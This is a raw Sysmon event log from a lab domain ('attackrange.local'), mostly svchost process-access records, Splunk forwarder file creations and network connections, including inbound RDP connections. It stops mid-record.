09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.907{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.906{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.906{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.859{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02E223F8A5E6BE7842343B41576029B,SHA256=8CE045D91191E47DC8F49173777FF4B75C98A470870E0633DB53B08FB6450BFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.852{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59294-false10.0.1.12-8000- 23542300x8000000000000000977297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:30.192{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0783066150FD6EF99C4EBF9A783218C,SHA256=C426F6EC26A252174F69C7422052741FA938B803A925C4DC188FE427B93D9047,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.454{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-5175-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:31.598{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB35E23DB7DC4B135C464980E33FA5BC,SHA256=3D1F107A47E46101A644DDB370A3E4E8DBFD1FE7E5087E30CFD563C20BA03A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:31.005{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E960D4DB91EB522F72D481B8803AC161,SHA256=8C2C0B4393666C5914A52FD50DA142FFC5A91FEA7D95E953BCAA48FCDAD46A75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:32.489{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B7F9F4BCB65B66F68B331BE8E48005B8,SHA256=6C1C1FA0E537AC3AFD019C83B5E7CC29A7B7A5AA7ABB1167FF338E258BDC143F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:32.239{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F014E5FF76CADBA4DC81AA71DE6C7E4A,SHA256=DF1304377B29F39E37F2FE71EA0D31915A3174BCEE560FD12EEDC1EF3AF15D93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.854{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53251-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:32.310{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46A831C1B71C3B9D0FD3932C37BA5A5D,SHA256=88511F7269FDA6C836BD3FDBBB9E7EA46464D6F911DCE2A5020D27133C220516,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:33.614{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B95DD43439A7706C676D1F020DF71B8C,SHA256=5CF10F802EC0944D00F637181054E96AF817CEA61A951CE96858977B3CA71605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:33.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7566788A21305BE03536D3274E533FFF,SHA256=33256A5F220EBD5C35CC87E0F132C5787C08794F25CD4C118A09125FE3F6A830,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:33.447{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:33.331{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9CBBB0350B00E731DCBA978FD563E2,SHA256=3B0B3014929F811222FB19E8AD0DD9C76CBD26A9E17B2D471297DB83C6A2331C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:30.332{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-50270-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:34.692{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE35B7018BE66E6D4C571CF37459FC6F,SHA256=17B1C601BD87F1BF65C328A86C17161C24FE970E67BDC4272E85B8BB877D0151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:34.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9704B6CAEC529F64369329DC5123159,SHA256=DD09FCCB5757699DCB6D38A40F1E59A60F1A34E412E14440F0A4A0F034B18079,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:30.781{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-18589-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:30.775{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 